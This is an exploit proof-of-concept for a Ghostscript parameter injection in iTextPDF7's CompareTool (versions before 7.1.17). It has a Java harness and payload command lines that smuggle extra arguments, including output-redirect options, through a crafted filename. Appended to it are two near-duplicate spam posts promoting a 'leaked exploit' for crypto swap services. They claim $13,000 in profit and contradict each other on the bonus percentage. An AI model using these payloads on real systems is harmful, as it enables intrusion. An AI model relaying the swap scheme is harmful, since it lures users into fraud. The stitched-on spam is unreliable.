iTextPDF7 Parameter Injection PoC

/*
Title: iTextPDF7 Java Ghostscript Parameter Injection
Software: iTextPDF7 (Java version)
Version: <7.1.17
Vulnerability: Parameter Injection
Credits: Gabriele Zuddas (gzuddas[_@t_]mentat.is)
Description: An attacker controlling the filename passed to the CompareTool class, is able to inject arbitrary parameters in the command line being executed (ghostscript). The vulnerable code resides inside the com/itextpdf/io/util/GhostscriptHelper.java.

Notes: Vendor quickly acknowledged and fixed the vulnerability starting from version 7.1.17 (https://github.com/itext/itext7/releases/tag/7.1.17)
*/

//To compile: javac -cp ".:*" Example.java
//PoC Payload: ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example 'a.pdf" -sstdout=hi.txt # '

import com.itextpdf.kernel.utils.CompareTool;
//Parameter injection: javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "a.pdf\\\" -?"
// javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "xxx.pdf\" - \0"

public class Example {
   public static void main(String args[]) throws Exception {
      CompareTool c = new CompareTool();
      c.compareVisually("a.pdf", args[0],  ".", ".", null);
   }
}


//$ITEXT_GS_EXEC  -dSAFER -dNOPAUSE -dBATCH -sDEVICE=png16m -r150  -sOutputFile="./cmp_xxx.pdf" - yyyyy-%03d.png" "xxx.pdf" - yyyyy"

//-dNOSAFER overrides -dSAFER

//javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "xxx.pdf\" -sstdout=a.txt"
//DROPS a file called 'a.txt-%03d.png\ xxx.pdf\ -sstdout=a.txt' on the filesystem

✅ Leaked Exploit Documentation:

https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

This made me $13,000 in 2 days.

Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from Swapzone — instant swap).
✅ Leaked Exploit Documentation:

https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

This made me $13,000 in 2 days.

Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).